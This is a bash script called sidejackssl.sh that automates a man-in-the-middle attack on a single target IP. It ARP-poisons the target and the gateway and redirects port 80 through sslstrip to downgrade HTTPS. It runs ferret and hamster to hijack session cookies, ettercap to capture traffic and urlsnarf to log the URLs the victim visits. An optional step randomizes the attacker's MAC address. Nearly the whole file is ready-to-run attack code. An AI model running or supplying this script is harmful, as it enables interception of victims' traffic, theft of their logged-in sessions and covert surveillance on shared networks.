1. #!/bin/bash
  2.  
  3. # sidejackssl.sh v0.1
  4. # tested in backtrack 4 R2 environment, run as root.
  5. # xterm used for window control
  6. # arpspoof poisons a single victim and gateway
  7. # ferret and hamster for sidejacking
  8. # sslstrip for https
  9. # ettercap for everything else
  10. # urlsnarf to monitor visited urls
  11. # firefox needs to be configured with a proxy of 127.0.0.1:1234
  12. # url for hamster server is http://hamster
  13. # by gorara
  14.  
  15. # a few variables (do not change)
  16. m1="0"                  # missing file var m1
  17. m2="0"                  # missing file var m2
  18. m3="0"                  # missing file var m3
  19. m4="0"                  # missing file var m4
  20. quickclean="0"              # used for quick clean up
  21. randmac="n"             # default setting do not randomize MAC
  22. hamsterfile="hamster.txt"       # hamster output file (you can't change it)
  23. trap 'cleanup' SIGINT SIGTERM       # detect control-c
  24.  
  25. # a few more variables (change these if required)
  26.  
  27. # xterm window variables
  28. x="0"                   # x offset value
  29. y="0"                   # y offset value
  30. width="120"             # width value
  31. height="7"              # height value
  32. yoffset="120"               # y offset
  33. fgcolor="white"             # foreground color
  34. bgcolor="black"             # background color
  35.  
  36. # style variables
  37. warnstyle="[\e[01;38mw\e[00m]"      # warning msgs style
  38. execstyle="[\e[01;32mx\e[00m]"      # execute msgs style
  39. infostyle="[\e[01;34mi\e[00m]"      # informational msgs style
  40. inputstyle="[\e[01;30m?\e[00m]"     # input msgs style
  41.  
  42. # file variables
  43. sslstripfile="sslstrip.log"     # sslstrip output file name
  44. snifffile="sniff-*"         # hamster sniff file wildcard
  45. etterfile="etter.cap"           # ettercap output cap file
  46. temp="/tmp"             # temporary dir
  47.  
  48. function usage
  49. {
  50.     clear
  51.     echo "Usage: bash $0 -i interface -t target -g gateway [-r] [-h]"
  52.     echo ""
  53.     echo "  -i interface    interface to use, ex. eth0, wlan0."
  54.     echo "  -t target   the target IP address."
  55.     echo "  -g gateway  the gateway IP address."
  56.     echo "  -r      randomize your MAC address,"
  57.     echo "          only use for wired interfaces."
  58.     echo "  -h      display this help screen."
  59.     echo ""
  60.     echo "  examples: "
  61.     echo "   bash $0 -i eth0 -t 192.168.0.1 -g 192.168.0.254 -r"
  62.     echo "   bash $0 -i wlan0 -t 192.168.0.1 -g 192.168.0.254"
  63.     echo ""
  64.     exit 0
  65. }
  66.  
  67. function cleanup() {
  68. echo -e "\n$warnstyle control-c pressed! "
  69.  
  70. # exit script if nothing has been modified
  71. if [[ "$quickclean" = "1" ]]; then
  72. echo -e "$infostyle nothing changed, all done!"
  73. exit 0
  74. fi
  75.  
  76. echo -e "$infostyle cleaning up..."
  77. echo -e "$execstyle flushing iptables..."
  78. iptables -F
  79. iptables -t nat -F
  80.  
  81. echo -e "$execstyle turning off IP forwarding..."
  82. echo "0" > /proc/sys/net/ipv4/ip_forward
  83.  
  84. # change back MAC address to orignal one
  85. if [[ "$randmac" = "y" || "$randmac" = "Y" ]]; then
  86. echo -e "$execstyle resetting MAC address...";
  87. echo -e "$infostyle original MAC is: $origmac"
  88. ifconfig $interface down
  89. ifconfig $interface hw ether $origmac
  90. ifconfig $interface up
  91.     if [ -z $gw ]; then
  92.     echo -e "$warnstyle WARNING, you have no default gateway!"
  93.     else
  94.     route add default gw $gw
  95.     fi
  96. rm $temp/mac.orig
  97. rm $temp/gw.orig
  98. fi
  99.  
  100. echo -e "$execstyle cleaning up files..."
  101. echo -e "$infostyle temp directory: "
  102.  
  103. # testing to see if files exist, if so display them...
  104.     if [ -f $temp/$sslstripfile ]; then
  105.     ls $temp/$sslstripfile
  106.     else
  107.     #echo -e "$warnstyle missing $sslstripfile"
  108.     m1="1"
  109.     fi
  110.  
  111.     if [ -f $temp/$etterfile ]; then
  112.     ls $temp/$etterfile
  113.     else
  114.     #echo -e "$warnstyle missing $etterfile"
  115.     m2="1"
  116.     fi
  117.  
  118. echo -e "$infostyle current directory: "
  119.  
  120.     if [ -f $snifffile ]; then
  121.     ls $snifffile
  122.     else
  123.     #echo -e "$warnstyle missing $snifffile"
  124.     m3="1"
  125.     fi
  126.  
  127.     if [ -f $hamsterfile ]; then
  128.     ls $hamsterfile
  129.     else
  130.     #echo -e "$warnstyle missing $hamsterfile"
  131.     m4="1"
  132.     fi
  133.  
  134. # testing to see if there are any files at all
  135. if [[ $m1 -eq 0 || $m2 -eq 0 || $m3 -eq 0 || $m4 -eq 0 ]]; then
  136.  
  137. while [[ "$delete" != "y" || "$delete" != "n" ]]
  138.  
  139. echo -en "$infostyle delete file(s)? [y/n]: "
  140. read delete
  141.  
  142. do
  143.     case "$delete" in
  144.         y) delete_marker="y"; echo -e "$warnstyle deleting files!"; break;;
  145.     n) echo -e "$warnstyle nothing deleted!"; break;;
  146.         *) echo -e "$warnstyle wrong selection!";
  147.     esac
  148. done
  149.  
  150. # delete files as requested
  151. if [[ "$delete_marker" = "y" ]]; then
  152.     if [ -f $temp/$sslstripfile ]; then
  153.     rm $temp/$sslstripfile
  154.     fi
  155.  
  156.     if [ -f $temp/$etterfile ]; then
  157.     rm $temp/$etterfile
  158.     fi
  159.  
  160.     if [ -f $snifffile ]; then
  161.     rm $snifffile
  162.     fi
  163.  
  164.     if [ -f $hamsterfile ]; then
  165.     rm $hamsterfile
  166.     fi
  167. fi
  168.  
  169. else
  170.  
  171.     echo -e "$warnstyle nothing to delete!"
  172. fi
  173.  
  174. echo -e "$infostyle all done!"
  175. exit 0
  176. }
  177.  
  178.  
  179. # start main program
  180. if [ "$#" -eq 0 ]; then
  181. usage
  182. fi
  183.  
  184. while [ "$#" -gt 0 ]
  185. do
  186.     case "$1" in
  187.         -i)  interface=$2; shift 1;;
  188.     -r)  randmac="y"; shift 1;;
  189.     -t)  target=$2; shift 1;;
  190.     -g)  gateway=$2; shift 1;;
  191.     -h)  usage;;
  192.     -*)  usage; break;;
  193.     *)  break;;
  194.     esac
  195.     shift
  196. done
  197.  
  198. # required parameters
  199. if [[ -z $interface || -z $target || -z $gateway ]]; then
  200. usage
  201. exit 0
  202. fi
  203.  
  204. clear
  205.  
  206. if [[ "$randmac" = "y" ]]; then
  207. mac="yes"
  208. else
  209. mac="no"
  210. fi
  211.  
  212. # set quick cleanup flag
  213. quickclean="1"
  214.  
  215. echo -e "$infostyle sidejacker/sslstrip script v0.1, by gorara"
  216. echo -e "$infostyle ctrl-c to abort at any time."
  217. echo -e "$infostyle attack summary:"
  218. echo -e "$infostyle host $target and gateway $gateway from $interface, spoof MAC: $mac"
  219.  
  220. if [[ "$randmac" = "y" ]]; then
  221.  
  222. echo -e "$execstyle change of $interface MAC address requested."
  223.  
  224. if [[ "$interface" = wlan* || "$interface" = wifi* || "$interface" = ath* ]]; then
  225. echo -e "$infostyle wireless device detected..."
  226. echo -e "$warnstyle can't change MAC address without taking wifi interface down"
  227. echo -e "$warnstyle do it manually before connecting to the AP."
  228. exit 0
  229. fi
  230.  
  231. if [[ "$interface" = eth* ]]; then
  232. echo -e "$infostyle wired device detected..."
  233. echo -e "$warnstyle WARNING, this will take your wired interface down temporarily."
  234. echo -en "$inputstyle do you want to continue? [y/n]: "
  235. read continue
  236.     if [[ "$continue" = "y" ]]; then
  237.     echo -e "$infostyle proceeding..."
  238.     else
  239.     echo -e "$infostyle exiting..."
  240.     exit 0 
  241.     fi
  242. fi
  243.  
  244. origmac=`ifconfig $interface | grep HWaddr | awk {'print $5'}`
  245.  
  246. fi
  247.  
  248. # before this, ctrl-c will exit script without doing anything.
  249. quickclean="0"
  250.  
  251. # use macchanger to randomize MAC address, ect.
  252. if [[ "$randmac" = "y" || "$randmac" = "Y" ]]; then
  253. echo -e "$execstyle randomizing MAC address...";
  254. gw=`route -n | grep UG | awk {'print $2'}` > $temp/gw.orig
  255. ifconfig $interface down
  256. macchanger -r $interface > $temp/mac.orig
  257. ifconfig $interface up
  258.     if [ -z $gw ]; then
  259.     echo -e "$warnstyle WARNING, you have no default gateway!"
  260.     else
  261.     route add default gw $gw
  262.     fi
  263. origmac=`cat $temp/mac.orig | grep Current | awk {'print $3'}`
  264. fakemac=`cat $temp/mac.orig | grep Faked | awk {'print $3'}`
  265. echo -e "$infostyle original MAC is: $origmac"
  266. echo -e "$infostyle faked    MAC is: $fakemac"
  267. fi
  268.  
  269. echo -e "$execstyle turning on IP Forwarding..."
  270. echo "1" > /proc/sys/net/ipv4/ip_forward
  271.  
  272. echo -e "$execstyle configuring iptables..."
  273. iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
  274. sleep 1
  275.  
  276. echo -e "$execstyle starting hamster  ... <logging to: $hamsterfile>"
  277. xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "hamster" -e /pentest/sniffers/hamster/hamster &
  278. sleep 2
  279.  
  280. echo -e "$execstyle starting ferret   ... <logging to: console>"
  281. y=$(($y+$yoffset))
  282. xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "ferret" -e /pentest/sniffers/hamster/ferret -i $interface &
  283. sleep 2
  284.  
  285. echo -e "$execstyle starting sslstrip ... <logging to: $temp/$sslstripfile>"
  286. y=$(($y+$yoffset))
  287. xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "sslstrip" -e sslstrip -w $temp/$sslstripfile &
  288. sleep 2
  289.  
  290. echo -e "$execstyle starting ettercap ... <logging to: $temp/$etterfile>"
  291. y=$(($y+$yoffset))
  292. xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "ettercap" -e ettercap -Tqpi $interface -w $temp/$etterfile /$gateway/ /$target/ &
  293. sleep 2
  294.  
  295. echo -e "$execstyle starting urlsnarf ... <logging to: console>"
  296. y=$(($y+$yoffset))
  297. xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "urlsnarf" -e urlsnarf -i $interface &
  298. sleep 2
  299.  
  300. echo -e "$infostyle trap is ready, now to direct traffic..."
  301.  
  302. echo -e "$execstyle ARP poisoning the target..."
  303. y=$(($y+$yoffset))
  304. xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "arpspoof" -e arpspoof -i $interface -t $target $gateway &
  305. sleep 1
  306.  
  307. echo -e "$infostyle run firefox and type http://hamster"
  308. echo -e "$infostyle don't forget to set proxy to 127.0.0.1:1234"
  309. echo -e "$infostyle press ctrl-c to exit and clean up... \n"
  310. for ((;;)) do
  311. read loop
  312. echo -en "$infostyle press ctrl-c to terminate!"
  313. done
  314.  
  315. exit 0